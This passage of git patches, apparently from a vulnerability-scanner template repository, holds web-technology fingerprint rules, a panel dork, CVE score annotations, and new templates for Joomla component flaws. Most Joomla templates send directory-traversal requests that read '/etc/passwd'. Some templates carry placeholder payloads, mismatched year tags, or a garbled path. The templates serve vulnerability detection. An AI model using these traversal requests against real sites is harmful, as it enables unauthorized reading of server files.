name: promail + words: + - powered by squirrelmail.org. squirrelmail + - promail ™ - login + + - type: word + condition: and + name: prometheus + words: + - Prometheus + + - type: word + condition: and + name: promise-webpam + words: + - js/promise/themes/apple/images/logo_promise.png + + - type: word + condition: and + name: promise-webpam + words: + - src="js/dojo/promise.js + + - type: word + condition: and + name: promisec-system + words: + - name="promisecactivex" + + - type: word + condition: and + part: header + name: proscan + words: + - 'Server: proscan' + + - type: word + condition: and + name: proxmox-ve + words: + - class="boxheadline">proxmox virtual environment + + - type: word + condition: and + name: proxmox-ve + words: + - href='http://www.proxmox.com' target='_blank' class="boxheadline + + - type: word + condition: and + name: proxmox-ve + words: + - ext.create('pve.stdworkspace') + + - type: word + condition: and + name: public-security-checkpoint-document-verification-system + words: + - content="公安检查站人脸/证件合一核录系统 + + - type: word + condition: and + name: publicopinionmonitoringsystem + words: + - /mpoweb/a/login + + - type: word + condition: and + name: pulsesecure-ssl-vpn + words: + - <b>pulse connect secure</b> + + - type: word + condition: and + name: puridiom + words: + - content="/puridiom/system/header.jsp + + - type: word + condition: and + name: puridiom + words: + - src="/puridiom/system/processing.jsp + + - type: word + condition: and + name: pygopherd + words: + - generated by <a href="http://www.quux.org/devel/gopher/pygopherd + + - type: word + condition: and + name: pyspider + words: + - content="pyspider dashboard" + + - type: word + condition: and + name: qcodo-development-framework + words: + - zend engine version:</b> + + - type: word + condition: and + name: qcodo-development-framework + words: + - '<b>qcodo version:' + + - type: word + condition: and + name: qcubed-development-framework + words: + - <div id="codeversion">qcubed development framework + + - type: word + condition: and + name: qcubed-development-framework + words: + - <b>qcubed version:</b> + + - type: word + condition: and + name: qianxin-analytics + words: + - href="/static/build/animate_nprogress_timepiacker_tooltipster.min.css + + - type: word + condition: and + name: qianxing-oa + words: + - input name="s1" type="image" + + - type: word + condition: and + name: qianxing-oa + words: + - count/mystat.asp + + - type: word + condition: and + name: qibosoft-microsite + words: + - powered by qibosoft v1.0 + + - type: word + condition: and + name: qibosoft-v7 + words: + - /images/v7/cms.css"> + + - type: word + condition: and + name: qingyuan-hsse + words: + - hsse 系统 + + - type: word + condition: and + name: qingyuan-management-system + words: + - -moz-background-size + - class="u_logo fa fa-user" + + - type: word + condition: and + name: qinzhe-excel + words: + - 如果能访问到qinzhe网站上的图片,说明网络是通的,显示新闻 + + - type: word + condition: and + name: qinzhe-excel + words: + - id="chkworkbyreplacer" type="checkbox" + + - type: word + condition: and + name: qm-system + words: + - src="polyfills.js + + - type: word + condition: and + name: qm-system + words: + - assets/css/fdb.css + + - type: word + condition: and + name: qtweb + words: + - url=gqrtweb + + - type: word + condition: and + name: quarkmail + words: + - window.location.replace("/cgi-bin/web2cgi/index.cgi"); + + - type: word + condition: and + name: quarkmail + words: + - <iframe src="/cgi-bin/web2cgi/index.cgi" scrolling="no" frameborder= + + - type: word + condition: and + name: quest-dr + words: + - quest software + + - type: word + condition: and + name: quest-dr + words: + - cui-login-screen + + - type: word + condition: and + name: quest-password-manager + words: + - style="display:none" id="account_notfilled.textbox + + - type: word + condition: and + name: quest-password-manager + words: + - id="ginapageexpiration + + - type: word + condition: and + name: quest-password-manager + words: + - id="ctl00_ctl00_ctl00_ctl00_body + + - type: word + condition: and + name: quest-password-manager + words: + - id="ctl00_ctl00_ctl00_ctl00_contentplaceholder_pleasewait_content + + - type: word + condition: and + name: quixplorer + words: + - target="_blank">the quix project</a></small> + + - type: word + condition: and + name: qzsafemail + words: + - /qzmail/index.php + + - type: word + condition: and + name: rabbitmq + words: + - <title>RabbitMQ Management + + - type: word + condition: and + name: radware-appwall + words: + - unauthorized activity has been detected. + + - type: word + condition: and + name: raiden-mail + words: + - /webimages/raidenmaild.jpg + + - type: word + condition: and + name: rainier-internet-product + words: + - 北京润尼尔网络科技有限公司 + + - type: word + condition: and + name: rainmail + words: + - '.: rainmail intranet login :.
    ' + + - type: word + condition: and + name: rainmail + words: + - href="/resources/rainmailvpninstaller.exe + + - type: word + condition: and + name: raisecom-ivoice8000 + words: + - id="com_raisecom_ums_aos_portal_login_domain + + - type: word + condition: and + name: ralph + words: + - ralph 3 + + - type: word + condition: and + name: ranzhi-oa + words: + - /sys/index.php?m=user&f=login&referer= + + - type: word + condition: and + name: rap2 + words: + - webpackJsonprap2-dolores + + - type: word + condition: and + name: rapid-browser + words: + - '' + + - type: word + condition: and + name: rapid-browser + words: + - images/login_button.gif" alt="login to rapid browser + + - type: word + condition: and + name: rbsoft-software + words: + - name="redirectto" value="/zym/rbkj.nsf" + + - type: word + condition: and + name: rconfig + words: + - rConfigLogo + + - type: word + condition: and + name: realtime-web-acars + words: + - content="realtime web acars + + - type: word + condition: and + name: reddoxx + words: + - 148779de-1cf1-49bb-8bdb-129321cf8974 + + - type: word + condition: and + name: redflag-linux-cluster-management-system + words: + - 登录到红旗集群管理系统
    + + - type: word + condition: and + name: whatweb + words: + - network card access password: + + - type: word + condition: and + name: whfst-cms + words: + - 武汉富思特 + + - type: word + condition: and + name: whir + words: + - css/css_whir.css + + - type: word + condition: and + name: whir-ezoffice + words: + - ezofficeusername + + - type: word + condition: and + name: whir-ezoffice + words: + - whirrootpath + + - type: word + condition: and + name: whir-ezoffice + words: + - /defaultroot/js/cookie.js + + - type: word + condition: and + name: whir-flexoffice + words: + - var flexofficepath="\/flexoffice" + + - type: word + condition: and + name: whmcs + words: + - powered by please login or register + + - type: word + condition: and + name: whtzjkj-erp + words: + - href="/content/home/tzjlog.ico" + + - type: word + condition: and + name: wildfly-server + words: + - wildfly project + + - type: word + condition: and + name: willfar-interface-management-tool + words: + - the wasion software foundation + + - type: word + condition: and + name: willfar-interface-management-tool + words: + - alt="接口应用管理工具" + + - type: word + condition: and + name: windows-business-server + words: + - src="images/sbslogo.gif + + - type: word + condition: and + name: windows-business-server + words: + - href="/remote">remote web workplace + + - type: word + condition: and + part: header + name: windriver + words: + - 'Server: windriver-webserver' + + - type: word + condition: and + part: header + name: wing-ftp-server + words: + - 'Server: wing ftp server' + + - type: word + condition: and + name: winiis-isp-access-resource-management-system + words: + - winisp.gif + + - type: word + condition: and + name: winmail-server + words: + - amax information technologies inc. + + - type: word + condition: and + name: winmail-server + words: + - 'pop3,smtp server: ' + + - type: word + condition: and + name: winmail-server + words: + - src="themes/default/images/mail_pic.jpg + + - type: word + condition: and + name: winmail-server + words: + - encryptpwd + - sessid + + - type: word + condition: and + name: winmail-server + words: + - f_theme + - pwdplaceholder + + - type: word + condition: and + name: winmail-server + words: + - winmail mail server + + - type: word + condition: and + name: winmail-server + words: + - '(build ' + - background="customer/winmail_bg11.jpg + + - type: word + condition: and + name: winmail-server + words: + - src="customer/index_winmail_new.gif + + - type: word + condition: and + name: winwebmail + words: + - winwebmail server + + - type: word + condition: and + name: winwebmail + words: + - images/owin.css + + - type: word + condition: and + name: winwebmail + words: + - + + - type: word + condition: and + name: winwebmail + words: + - type="hidden" name="secex" + + - type: word + condition: and + name: winwebmail + words: + - href="images\hwem.css" + + - type: word + condition: and + name: wireless-access-point-controller + words: + - var oemproductname = "mvc_howay6000" + + - type: word + condition: and + name: wireless-access-point-controller + words: + - From 08db2a1ebb814aade067dc05df9853d34aa97da7 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 27 Sep 2021 15:56:15 +0530 Subject: [PATCH 2524/4083] Update intelbras-login.yaml --- exposed-panels/intelbras-login.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/exposed-panels/intelbras-login.yaml b/exposed-panels/intelbras-login.yaml index 21942ef9d4..f3062f3fc1 100644 --- a/exposed-panels/intelbras-login.yaml +++ b/exposed-panels/intelbras-login.yaml @@ -5,9 +5,10 @@ info: author: DhiyaneshDK severity: info reference: https://www.exploit-db.com/ghdb/7272 - tags: panel metadata: shodan-dork: http.title:"Intelbras" + google-dork: intitle:"Intelbras" "All Rights Reserved" -.com + tags: panel requests: - method: GET From fb776417b54e835dbeb939ef52b7bcfab4dc89b0 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 27 Sep 2021 10:27:40 +0000 Subject: [PATCH 2525/4083] Auto Generated CVE annotations [Mon Sep 27 10:27:40 UTC 2021] :robot: --- cves/2021/CVE-2021-38647.yaml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/cves/2021/CVE-2021-38647.yaml b/cves/2021/CVE-2021-38647.yaml index 7fbede7607..ed29c6ae66 100644 --- a/cves/2021/CVE-2021-38647.yaml +++ b/cves/2021/CVE-2021-38647.yaml @@ -12,6 +12,10 @@ info: - https://attackerkb.com/topics/08O94gYdF1/cve-2021-38647 - https://censys.io/blog/understanding-the-impact-of-omigod-cve-2021-38647/ - https://github.com/microsoft/omi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-38647 requests: - raw: From 99281263ea59428cd7b554242a902901b3c58c17 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 27 Sep 2021 10:57:21 +0000 Subject: [PATCH 2526/4083] Auto Generated CVE annotations [Mon Sep 27 10:57:21 UTC 2021] :robot: --- cves/2021/CVE-2021-38647.yaml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/cves/2021/CVE-2021-38647.yaml b/cves/2021/CVE-2021-38647.yaml index 7fbede7607..ed29c6ae66 100644 --- a/cves/2021/CVE-2021-38647.yaml +++ b/cves/2021/CVE-2021-38647.yaml @@ -12,6 +12,10 @@ info: - https://attackerkb.com/topics/08O94gYdF1/cve-2021-38647 - https://censys.io/blog/understanding-the-impact-of-omigod-cve-2021-38647/ - https://github.com/microsoft/omi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-38647 requests: - raw: From 60ebe6449744c3b84a9d746425a3760c4f6ac817 Mon Sep 17 00:00:00 2001 From: daffainfo Date: Mon, 27 Sep 2021 18:02:48 +0700 Subject: [PATCH 2527/4083] Adding daffainfo templates --- cves/2007/CVE-2007-4504.yml | 27 +++++++++++++++++++++++++++ cves/2008/CVE-2008-4764.yml | 27 +++++++++++++++++++++++++++ cves/2008/CVE-2008-6080.yml | 27 +++++++++++++++++++++++++++ cves/2008/CVE-2008-6222.yml | 27 +++++++++++++++++++++++++++ cves/2009/CVE-2009-1496.yml | 27 +++++++++++++++++++++++++++ cves/2009/CVE-2009-2015.yml | 27 +++++++++++++++++++++++++++ cves/2009/CVE-2009-2100.yml | 27 +++++++++++++++++++++++++++ cves/2009/CVE-2009-3053.yml | 27 +++++++++++++++++++++++++++ cves/2009/CVE-2009-3318.yml | 27 +++++++++++++++++++++++++++ cves/2009/CVE-2009-4202.yml | 27 +++++++++++++++++++++++++++ cves/2009/CVE-2009-4679.yml | 27 +++++++++++++++++++++++++++ cves/2010/CVE-2010-0157.yml | 27 +++++++++++++++++++++++++++ cves/2010/CVE-2010-0467.yml | 27 +++++++++++++++++++++++++++ cves/2010/CVE-2010-0696.yml | 27 +++++++++++++++++++++++++++ cves/2010/CVE-2010-0759.yml | 27 +++++++++++++++++++++++++++ cves/2010/CVE-2010-0942.yml | 27 +++++++++++++++++++++++++++ cves/2010/CVE-2010-0972.yml | 27 +++++++++++++++++++++++++++ cves/2010/CVE-2010-0982.yml | 27 +++++++++++++++++++++++++++ cves/2010/CVE-2010-1056.yml | 27 +++++++++++++++++++++++++++ cves/2010/CVE-2010-1081.yml | 27 +++++++++++++++++++++++++++ cves/2010/CVE-2010-1217.yml | 27 +++++++++++++++++++++++++++ cves/2010/CVE-2010-1302.yml | 27 +++++++++++++++++++++++++++ cves/2010/CVE-2010-1340.yml | 27 +++++++++++++++++++++++++++ cves/2010/CVE-2010-1461.yml | 27 +++++++++++++++++++++++++++ cves/2010/CVE-2010-1469.yml | 27 +++++++++++++++++++++++++++ cves/2010/CVE-2010-1478.yml | 27 +++++++++++++++++++++++++++ cves/2010/CVE-2010-1491.yml | 27 +++++++++++++++++++++++++++ cves/2010/CVE-2010-1540.yml | 27 +++++++++++++++++++++++++++ cves/2010/CVE-2010-1603.yml | 27 +++++++++++++++++++++++++++ cves/2010/CVE-2010-1653.yml | 27 +++++++++++++++++++++++++++ cves/2010/CVE-2010-1658.yml | 27 +++++++++++++++++++++++++++ cves/2010/CVE-2010-1715.yml | 27 +++++++++++++++++++++++++++ cves/2010/CVE-2010-1873.yml | 27 +++++++++++++++++++++++++++ cves/2010/CVE-2010-1878.yml | 27 +++++++++++++++++++++++++++ cves/2010/CVE-2010-1957.yml | 27 +++++++++++++++++++++++++++ cves/2010/CVE-2010-1977.yml | 27 +++++++++++++++++++++++++++ cves/2010/CVE-2010-1982.yml | 27 +++++++++++++++++++++++++++ cves/2010/CVE-2010-2045.yml | 27 +++++++++++++++++++++++++++ cves/2010/CVE-2010-2050.yml | 27 +++++++++++++++++++++++++++ cves/2010/CVE-2010-2128.yml | 27 +++++++++++++++++++++++++++ cves/2010/CVE-2010-2507.yml | 27 +++++++++++++++++++++++++++ cves/2010/CVE-2010-2680.yml | 27 +++++++++++++++++++++++++++ cves/2010/CVE-2010-2857.yml | 27 +++++++++++++++++++++++++++ cves/2010/CVE-2010-2918.yml | 27 +++++++++++++++++++++++++++ cves/2010/CVE-2010-3203.yml | 27 +++++++++++++++++++++++++++ cves/2010/CVE-2010-4282.yml | 27 +++++++++++++++++++++++++++ cves/2010/CVE-2010-4719.yml | 27 +++++++++++++++++++++++++++ cves/2010/CVE-2010-4769.yml | 27 +++++++++++++++++++++++++++ cves/2010/CVE-2010-4977.yml | 27 +++++++++++++++++++++++++++ cves/2010/CVE-2010-5028.yml | 27 +++++++++++++++++++++++++++ cves/2010/CVE-2010-5286.yml | 27 +++++++++++++++++++++++++++ cves/2011/CVE-2011-2744.yml | 27 +++++++++++++++++++++++++++ cves/2012/CVE-2012-0981.yml | 27 +++++++++++++++++++++++++++ cves/2012/CVE-2012-0996.yml | 27 +++++++++++++++++++++++++++ cves/2012/CVE-2012-1226.yml | 27 +++++++++++++++++++++++++++ cves/2014/CVE-2014-10037.yml | 27 +++++++++++++++++++++++++++ cves/2014/CVE-2014-4539.yaml | 31 +++++++++++++++++++++++++++++++ cves/2014/CVE-2014-4550.yaml | 31 +++++++++++++++++++++++++++++++ cves/2014/CVE-2014-4558.yaml | 31 +++++++++++++++++++++++++++++++ cves/2014/CVE-2014-4561.yaml | 31 +++++++++++++++++++++++++++++++ cves/2014/CVE-2014-4592.yaml | 31 +++++++++++++++++++++++++++++++ cves/2014/CVE-2014-5111.yml | 27 +++++++++++++++++++++++++++ cves/2014/CVE-2014-5258.yml | 27 +++++++++++++++++++++++++++ cves/2015/CVE-2015-4414.yml | 27 +++++++++++++++++++++++++++ cves/2015/CVE-2015-4632.yml | 27 +++++++++++++++++++++++++++ 65 files changed, 1775 insertions(+) create mode 100644 cves/2007/CVE-2007-4504.yml create mode 100644 cves/2008/CVE-2008-4764.yml create mode 100644 cves/2008/CVE-2008-6080.yml create mode 100644 cves/2008/CVE-2008-6222.yml create mode 100644 cves/2009/CVE-2009-1496.yml create mode 100644 cves/2009/CVE-2009-2015.yml create mode 100644 cves/2009/CVE-2009-2100.yml create mode 100644 cves/2009/CVE-2009-3053.yml create mode 100644 cves/2009/CVE-2009-3318.yml create mode 100644 cves/2009/CVE-2009-4202.yml create mode 100644 cves/2009/CVE-2009-4679.yml create mode 100644 cves/2010/CVE-2010-0157.yml create mode 100644 cves/2010/CVE-2010-0467.yml create mode 100644 cves/2010/CVE-2010-0696.yml create mode 100644 cves/2010/CVE-2010-0759.yml create mode 100644 cves/2010/CVE-2010-0942.yml create mode 100644 cves/2010/CVE-2010-0972.yml create mode 100644 cves/2010/CVE-2010-0982.yml create mode 100644 cves/2010/CVE-2010-1056.yml create mode 100644 cves/2010/CVE-2010-1081.yml create mode 100644 cves/2010/CVE-2010-1217.yml create mode 100644 cves/2010/CVE-2010-1302.yml create mode 100644 cves/2010/CVE-2010-1340.yml create mode 100644 cves/2010/CVE-2010-1461.yml create mode 100644 cves/2010/CVE-2010-1469.yml create mode 100644 cves/2010/CVE-2010-1478.yml create mode 100644 cves/2010/CVE-2010-1491.yml create mode 100644 cves/2010/CVE-2010-1540.yml create mode 100644 cves/2010/CVE-2010-1603.yml create mode 100644 cves/2010/CVE-2010-1653.yml create mode 100644 cves/2010/CVE-2010-1658.yml create mode 100644 cves/2010/CVE-2010-1715.yml create mode 100644 cves/2010/CVE-2010-1873.yml create mode 100644 cves/2010/CVE-2010-1878.yml create mode 100644 cves/2010/CVE-2010-1957.yml create mode 100644 cves/2010/CVE-2010-1977.yml create mode 100644 cves/2010/CVE-2010-1982.yml create mode 100644 cves/2010/CVE-2010-2045.yml create mode 100644 cves/2010/CVE-2010-2050.yml create mode 100644 cves/2010/CVE-2010-2128.yml create mode 100644 cves/2010/CVE-2010-2507.yml create mode 100644 cves/2010/CVE-2010-2680.yml create mode 100644 cves/2010/CVE-2010-2857.yml create mode 100644 cves/2010/CVE-2010-2918.yml create mode 100644 cves/2010/CVE-2010-3203.yml create mode 100644 cves/2010/CVE-2010-4282.yml create mode 100644 cves/2010/CVE-2010-4719.yml create mode 100644 cves/2010/CVE-2010-4769.yml create mode 100644 cves/2010/CVE-2010-4977.yml create mode 100644 cves/2010/CVE-2010-5028.yml create mode 100644 cves/2010/CVE-2010-5286.yml create mode 100644 cves/2011/CVE-2011-2744.yml create mode 100644 cves/2012/CVE-2012-0981.yml create mode 100644 cves/2012/CVE-2012-0996.yml create mode 100644 cves/2012/CVE-2012-1226.yml create mode 100644 cves/2014/CVE-2014-10037.yml create mode 100644 cves/2014/CVE-2014-4539.yaml create mode 100644 cves/2014/CVE-2014-4550.yaml create mode 100644 cves/2014/CVE-2014-4558.yaml create mode 100644 cves/2014/CVE-2014-4561.yaml create mode 100644 cves/2014/CVE-2014-4592.yaml create mode 100644 cves/2014/CVE-2014-5111.yml create mode 100644 cves/2014/CVE-2014-5258.yml create mode 100644 cves/2015/CVE-2015-4414.yml create mode 100644 cves/2015/CVE-2015-4632.yml diff --git a/cves/2007/CVE-2007-4504.yml b/cves/2007/CVE-2007-4504.yml new file mode 100644 index 0000000000..530d923bce --- /dev/null +++ b/cves/2007/CVE-2007-4504.yml @@ -0,0 +1,27 @@ +id: CVE-2007-4504 + +info: + name: Joomla! Component RSfiles 1.0.2 - 'path' File Download + author: daffainfo + severity: high + description: Directory traversal vulnerability in index.php in the RSfiles component (com_rsfiles) 1.0.2 and earlier for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the path parameter in a files.display action. + reference: | + - https://www.exploit-db.com/exploits/4307 + - https://www.cvedetails.com/cve/CVE-2007-4504 + tags: cve,cve2007,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_rsfiles&task=files.display&path=..|index.php" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2008/CVE-2008-4764.yml b/cves/2008/CVE-2008-4764.yml new file mode 100644 index 0000000000..33cee1d111 --- /dev/null +++ b/cves/2008/CVE-2008-4764.yml @@ -0,0 +1,27 @@ +id: CVE-2008-4764 + +info: + name: Joomla! Component com_extplorer 2.0.0 RC2 - Directory Traversal + author: daffainfo + severity: high + description: Directory traversal vulnerability in the eXtplorer module (com_extplorer) 2.0.0 RC2 and earlier in Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the dir parameter in a show_error action. + reference: | + - https://www.exploit-db.com/exploits/5435 + - https://www.cvedetails.com/cve/CVE-2008-4764 + tags: cve,cve2008,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_extplorer&action=show_error&dir=..%2F..%2F..%2F%2F..%2F..%2Fetc%2Fpasswd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2008/CVE-2008-6080.yml b/cves/2008/CVE-2008-6080.yml new file mode 100644 index 0000000000..0fe05fb3b6 --- /dev/null +++ b/cves/2008/CVE-2008-6080.yml @@ -0,0 +1,27 @@ +id: CVE-2008-6080 + +info: + name: Joomla! Component ionFiles 4.4.2 - File Disclosure + author: daffainfo + severity: high + description: Directory traversal vulnerability in download.php in the ionFiles (com_ionfiles) 4.4.2 component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter. + reference: | + - https://www.exploit-db.com/exploits/6809 + - https://www.cvedetails.com/cve/CVE-2008-6080 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/components/com_ionfiles/download.php?file=../../../../../../../../etc/passwd&download=1" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2008/CVE-2008-6222.yml b/cves/2008/CVE-2008-6222.yml new file mode 100644 index 0000000000..5e11c820df --- /dev/null +++ b/cves/2008/CVE-2008-6222.yml @@ -0,0 +1,27 @@ +id: CVE-2008-6222 + +info: + name: Joomla! Component ProDesk 1.0/1.2 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Pro Desk Support Center (com_pro_desk) component 1.0 and 1.2 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the include_file parameter to index.php. + reference: | + - https://www.exploit-db.com/exploits/6980 + - https://www.cvedetails.com/cve/CVE-2008-6222 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_pro_desk&include_file=../../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2009/CVE-2009-1496.yml b/cves/2009/CVE-2009-1496.yml new file mode 100644 index 0000000000..9944f21d49 --- /dev/null +++ b/cves/2009/CVE-2009-1496.yml @@ -0,0 +1,27 @@ +id: CVE-2009-1496 + +info: + name: Joomla! Component Cmimarketplace - 'viewit' Directory Traversal + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Cmi Marketplace (com_cmimarketplace) component 0.1 for Joomla! allows remote attackers to list arbitrary directories via a .. (dot dot) in the viewit parameter to index.php. + reference: | + - https://www.exploit-db.com/exploits/8367 + - https://www.cvedetails.com/cve/CVE-2009-1496 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_cmimarketplace&Itemid=70&viewit=/../../&cid=1" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2009/CVE-2009-2015.yml b/cves/2009/CVE-2009-2015.yml new file mode 100644 index 0000000000..c311b2f97c --- /dev/null +++ b/cves/2009/CVE-2009-2015.yml @@ -0,0 +1,27 @@ +id: CVE-2009-2015 + +info: + name: Joomla! Component MooFAQ (com_moofaq) - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in includes/file_includer.php in the Ideal MooFAQ (com_moofaq) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter. + reference: | + - https://www.exploit-db.com/exploits/8898 + - https://www.cvedetails.com/cve/CVE-2009-2015 + tags: cve,cve2009,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/components/com_moofaq/includes/file_includer.php?gzip=0&file=/../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2009/CVE-2009-2100.yml b/cves/2009/CVE-2009-2100.yml new file mode 100644 index 0000000000..ded50fcd6b --- /dev/null +++ b/cves/2009/CVE-2009-2100.yml @@ -0,0 +1,27 @@ +id: CVE-2009-2100 + +info: + name: Joomla! Component com_Projectfork 2.0.10 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the JoomlaPraise Projectfork (com_projectfork) component 2.0.10 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the section parameter to index.php. + reference: | + - https://www.exploit-db.com/exploits/8946 + - https://www.cvedetails.com/cve/CVE-2009-2100 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_projectfork§ion= [-LFI-]" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2009/CVE-2009-3053.yml b/cves/2009/CVE-2009-3053.yml new file mode 100644 index 0000000000..7d8b0146da --- /dev/null +++ b/cves/2009/CVE-2009-3053.yml @@ -0,0 +1,27 @@ +id: CVE-2009-3053 + +info: + name: Joomla! Component Agora 3.0.0b (com_agora) - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Agora (com_agora) component 3.0.0b for Joomla! allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the action parameter to the avatars page, reachable through index.php. + reference: | + - https://www.exploit-db.com/exploits/9564 + - https://www.cvedetails.com/cve/CVE-2009-3053 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_agora&task=profile&page=avatars&action=[-LFI-]" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2009/CVE-2009-3318.yml b/cves/2009/CVE-2009-3318.yml new file mode 100644 index 0000000000..057db7e66e --- /dev/null +++ b/cves/2009/CVE-2009-3318.yml @@ -0,0 +1,27 @@ +id: CVE-2009-3318 + +info: + name: Joomla! Component com_album 1.14 - Directory Traversal + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Roland Breedveld Album (com_album) component 1.14 for Joomla! allows remote attackers to access arbitrary directories and have unspecified other impact via a .. (dot dot) in the target parameter to index.php. + reference: | + - https://www.exploit-db.com/exploits/9706 + - https://www.cvedetails.com/cve/CVE-2009-3318 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_album&Itemid=128&target=/../.." + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2009/CVE-2009-4202.yml b/cves/2009/CVE-2009-4202.yml new file mode 100644 index 0000000000..c9f6c7d875 --- /dev/null +++ b/cves/2009/CVE-2009-4202.yml @@ -0,0 +1,27 @@ +id: CVE-2009-4202 + +info: + name: Joomla! Component Omilen Photo Gallery 0.5b - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Omilen Photo Gallery (com_omphotogallery) component Beta 0.5 for Joomla! allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the controller parameter to index.php. + reference: | + - https://www.exploit-db.com/exploits/8870 + - https://www.cvedetails.com/cve/CVE-2009-4202 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_omphotogallery&controller=[-LFI-]" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2009/CVE-2009-4679.yml b/cves/2009/CVE-2009-4679.yml new file mode 100644 index 0000000000..5311cefc3c --- /dev/null +++ b/cves/2009/CVE-2009-4679.yml @@ -0,0 +1,27 @@ +id: CVE-2009-4679 + +info: + name: Joomla! Component iF Portfolio Nexus - 'Controller' Remote File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the inertialFATE iF Portfolio Nexus (com_if_nexus) component 1.5 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + reference: | + - https://www.exploit-db.com/exploits/33440 + - https://www.cvedetails.com/cve/CVE-2009-4679 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_kif_nexus&controller=[-LFI-]" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-0157.yml b/cves/2010/CVE-2010-0157.yml new file mode 100644 index 0000000000..022b4550bf --- /dev/null +++ b/cves/2010/CVE-2010-0157.yml @@ -0,0 +1,27 @@ +id: CVE-2010-0157 + +info: + name: Joomla! Component com_biblestudy - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Bible Study (com_biblestudy) component 6.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter in a studieslist action to index.php. + reference: | + - https://www.exploit-db.com/exploits/10943 + - https://www.cvedetails.com/cve/CVE-2010-0157 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_biblestudy&id=1&view=studieslist&controller=[-LFI-]" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-0467.yml b/cves/2010/CVE-2010-0467.yml new file mode 100644 index 0000000000..563c3c96c0 --- /dev/null +++ b/cves/2010/CVE-2010-0467.yml @@ -0,0 +1,27 @@ +id: CVE-2010-0467 + +info: + name: Joomla! Component CCNewsLetter - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the ccNewsletter (com_ccnewsletter) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a ccnewsletter action to index.php. + reference: | + - https://www.exploit-db.com/exploits/11282 + - https://www.cvedetails.com/cve/CVE-2010-0467 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - 